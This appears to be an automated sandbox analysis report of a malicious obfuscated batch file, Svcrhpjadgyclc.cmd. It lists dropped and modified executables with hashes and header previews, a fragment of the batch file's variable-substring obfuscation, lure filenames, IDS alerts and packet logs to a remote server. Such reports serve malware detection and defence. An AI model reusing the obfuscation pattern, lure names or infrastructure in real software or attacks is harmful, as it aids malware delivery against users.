Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638082" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\Public\Libraries\spoolsv.COM

Process:	C:\Users\Public\kn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1019392
Entropy (8bit):	7.012102322841487
Encrypted:	false
SSDEEP:	24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPM6d:0wnRQj0KyEB1zcwfPMA
MD5:	DFD15A4158AB979660435D6F3E95A3EC
SHA1:	6D5566CDDFB4B99E82A6BABDBD4536A24E8F6F73
SHA-256:	BAA12B649FDDD77EF62ECD2B3169FAB9BB5FBE78404175485F9A7FB48DC4456D
SHA-512:	F33677B419F307C8970C0024E45162BC83E63141878EC2D15B59011261CB30AA412076B62B80FD4E9B99713A689C10699EA8682F67754B2569C83B22B1225E02
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................$...f.......8.......@....@.......................... ...................@...........................P...&...............................n...................................................W...............................text............................... ..`.itext..L....0...................... ..`.data........@.......(..............@....bss.....6...............................idata...&...P...(..................@....tls....4................................rdata..............................@..@.reloc...n.......p..................@..B.rsrc...............................@..@............. ......................@..@................................................................................................

C:\Users\Public\alpha.exe

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	289792
Entropy (8bit):	6.135598950357573
Encrypted:	false
SSDEEP:	6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
SHA1:	F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
SHA-256:	B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
SHA-512:	99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse Filename: 1x40 CONTAINER.PDF-.bat, Detection: malicious, Browse Filename: 1x40 CONTAINER.PDF-.bat, Detection: malicious, Browse Filename: saw.bat, Detection: malicious, Browse Filename: A1 igazol#U00e1s.cmd, Detection: malicious, Browse Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious, Browse Filename: 78326473_PDF.cmd, Detection: malicious, Browse Filename: iuhmzvlH.cmd, Detection: malicious, Browse Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

C:\Users\Public\kn.exe

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	1651712
Entropy (8bit):	6.144018815244304
Encrypted:	false
SSDEEP:	24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
MD5:	F17616EC0522FC5633151F7CAA278CAA
SHA1:	79890525360928A674D6AEF11F4EDE31143EEC0D
SHA-256:	D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
SHA-512:	3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...\|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

C:\Users\Public\spoolsv.MPEG

Process:	C:\Users\Public\kn.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2038786
Entropy (8bit):	3.851807709819611
Encrypted:	false
SSDEEP:	24576:nTawbo9F7U7JIPcBTA/2ntge1ZGsPJmLeOg3hKFSIC09uriZeRwViOp8KB9/QTEj:k
MD5:	EB3C4DD5B03EB7E43016CB693C1C6820
SHA1:	8C3CBF8733A1642C43BB7847CCBF0338B931FB64
SHA-256:	AD93393E701DC0EBF905589E548FFA4A1BB894C34E70F8EE730E3FDF34158779
SHA-512:	0331DADCFCC4F06A38BB68C08FF1C3C60F009CCD57C3FF4C60E49090667D541D342E9DD6B01D989DCDE1091EAA21F142ED3D5A292970ABDFA58B8818FEC97A45
Malicious:	false
Preview:	4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b0102190024070000660800000000000438070000100000004007000000400000100000000200000400000000000000040000000000000000201000000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000500e00b626000000100f00000401000000000000000000000000000000000000a00e008c6e000000000000000000000000000000000000000000000000000000900e0018000000000000000000000000000000000000001c570e00040600000000000000000000000000000000000000000000

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.462947993692728
Encrypted:	false
SSDEEP:	6144:XIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:YXD94+WlLZMM6YFHg+n
MD5:	D2A31F7F897A56A913C4736FD99C60F8
SHA1:	7FF8CF88CA7059A1861EA26727E79E62E0A4A1B9
SHA-256:	F7B0AE2A354A2E394D6B39F6645D6E1469FA36B1618312581A543D3D7735B039
SHA-512:	C8940994B3D608D0AF93BCFC3B2AD46617BBDE86C982C49638AD99CD804A81A11201ED2FE8FAD5BC8F085BDA005AF49CB1FEAD9CFC92323EACD8075A3D60A447
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....R...............................................................................................................................................................................................................................................................................................................................................c..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Process:	C:\Users\Public\alpha.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.403504238247217
Encrypted:	false
SSDEEP:	3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
MD5:	E14D0D771A7FEB9D78EA3DCA9197BA2A
SHA1:	48E363AAD601D9073D803AA9D224BF9A7FC39119
SHA-256:	0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
SHA-512:	3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
Malicious:	false
Preview:	The system cannot find message text for message number 0x400023a1 in the message file for Application...

Static File Info

General

File type:	ISO-8859 text, with very long lines (965), with CRLF line terminators
Entropy (8bit):	5.141633843614557
TrID:
File name:	Svcrhpjadgyclc.cmd
File size:	2'966'423 bytes
MD5:	7afcba92a35ba26fcde12f3aba8ff7d8
SHA1:	8fe8577fc2ef8866c83ab163a8655ea777e6d4f4
SHA256:	29bda570966cf934b38ff7b1613f9330709307405391ced5452bd9cc63736331
SHA512:	a0fdbdb93054ea71efea0dc9ecee2d68644d89e0725a3c34e0d492fd6b2b3d9f3307fbfa5386cdec1e7f452754331bf73242e9316d3d667353cc7c62bad58027
SSDEEP:	24576:kH1yveXvtJNwYay5+kiD7Dm5c0B58llll8lUWtWJxM9bh+NfbTXr063u95fX7:kVyGftJ+YawbiS5BBUvzM9bh+NfnXm
TLSH:	99D593A32DED06C62B496B7B974FF9589A3BDC3C86C25DC812C725BD100A74B2CD0D5A
File Content Preview:	COMCOM..&@cls&@set "_....=viulzHg htI5f9UEDny7kBLWJSZAC1xTKNR6GmOeQr82qca4jX0@3wPYdsbopVFM"..%_....:~51,1%%_....:~57,1%%_....:~39,1%%_....:~9,1%%_....:~7,1%"_..=%_....:~37,1%%_....:~59,1%%_....:~10,1%%_....:~62,1%%_....:~33,1%%_....:~40,1%%_....:~55,1%%_.

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T12:39:18.449649+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	176.123.5.143	443	TCP
2024-12-19T12:39:21.905790+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	176.123.5.143	443	TCP
2024-12-19T12:39:25.382439+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	176.123.5.143	443	TCP
2024-12-19T12:39:28.797509+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	176.123.5.143	443	TCP
2024-12-19T12:39:32.381151+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	176.123.5.143	443	TCP
2024-12-19T12:40:04.918673+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	176.123.5.143	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 12:39:16.864058971 CET	49730	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:16.864094973 CET	443	49730	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:16.864165068 CET	49730	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:16.864288092 CET	49730	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:16.864340067 CET	443	49730	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:16.864784002 CET	49730	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:16.957802057 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:16.957834959 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:16.957916975 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:16.986143112 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:16.986156940 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:18.449548006 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:18.449649096 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:18.453521967 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:18.453531981 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:18.453809023 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:18.503819942 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:18.547089100 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:18.591324091 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:19.935323000 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:19.935352087 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:19.935359955 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:19.935369015 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:19.935404062 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:19.935519934 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:19.935519934 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:19.935539961 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:19.935590982 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.046288967 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.046314955 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.046406984 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.046425104 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.046468019 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.130501986 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.130532980 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.130781889 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.130801916 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.130882978 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.200663090 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.200756073 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.200850010 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.200880051 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.202044964 CET	49731	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.202064037 CET	443	49731	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.412153006 CET	49732	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.412267923 CET	443	49732	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.412400007 CET	49732	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.413961887 CET	49732	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.414076090 CET	443	49732	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.414149046 CET	49732	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.448533058 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.448582888 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:20.448646069 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.449101925 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:20.449116945 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:21.905651093 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:21.905790091 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:21.908140898 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:21.908155918 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:21.908472061 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:21.909852982 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:21.951340914 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.387310028 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.387345076 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.387362003 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.387463093 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.387505054 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.387553930 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.497883081 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.497906923 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.497962952 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.497997046 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.498037100 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.583198071 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.583221912 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.583345890 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.583388090 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.583436012 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.670149088 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.670248032 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.670319080 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.670368910 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.670650005 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.670675039 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.670691013 CET	49733	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.670696020 CET	443	49733	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.873581886 CET	49734	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.873708010 CET	443	49734	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.873877048 CET	49734	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.874089003 CET	49734	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.874140024 CET	443	49734	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.874205112 CET	49734	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.923379898 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.923434019 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:23.923513889 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.923863888 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:23.923878908 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:25.382337093 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:25.382438898 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:25.383908033 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:25.383918047 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:25.384146929 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:25.385495901 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:25.427320957 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.785079956 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.785109043 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.785124063 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.785244942 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:26.785279036 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.785331011 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:26.895994902 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.896015882 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.896078110 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:26.896102905 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.896127939 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:26.896142960 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:26.980715036 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.980736971 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.980822086 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:26.980859041 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:26.980906010 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.053328991 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:27.053407907 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.053422928 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:27.053464890 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.053639889 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.053661108 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:27.053672075 CET	49735	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.053677082 CET	443	49735	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:27.279345036 CET	49736	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.279401064 CET	443	49736	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:27.279622078 CET	49736	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.279871941 CET	49736	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.279942989 CET	443	49736	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:27.280028105 CET	49736	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.337234974 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.337304115 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:27.337387085 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.337734938 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:27.337759018 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:28.797437906 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:28.797508955 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:28.798984051 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:28.798993111 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:28.799422026 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:28.800775051 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:28.847326994 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.369291067 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.369318008 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.369337082 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.369374037 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.369385004 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.369412899 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.369441032 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.530514002 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.530544043 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.530592918 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.530610085 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.530633926 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.530663967 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.622855902 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.622879982 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.622946024 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.622956991 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.623009920 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.623029947 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.653929949 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.654022932 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.654026985 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.654071093 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.654263020 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.654284954 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.654300928 CET	49737	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.654309034 CET	443	49737	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.854582071 CET	49739	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.854634047 CET	443	49739	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.854871035 CET	49739	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.854979038 CET	49739	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.855084896 CET	443	49739	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.857099056 CET	49739	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.920928955 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.920967102 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:30.921107054 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.921458006 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:30.921472073 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:32.381062984 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:32.381150961 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:32.389267921 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:32.389280081 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:32.389528036 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:32.391117096 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:32.435332060 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:33.867425919 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:33.867460012 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:33.867480993 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:33.867522001 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:33.867535114 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:33.867563009 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:33.867587090 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:33.980462074 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:33.980530024 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:33.980591059 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:33.980612993 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:33.980633020 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:33.980659008 CET	49740	443	192.168.2.4	176.123.5.143
Dec 19, 2024 12:39:34.063541889 CET	443	49740	176.123.5.143	192.168.2.4
Dec 19, 2024 12:39:34.063592911 CET	443	49740	176.123.5.143	192.168.2.4
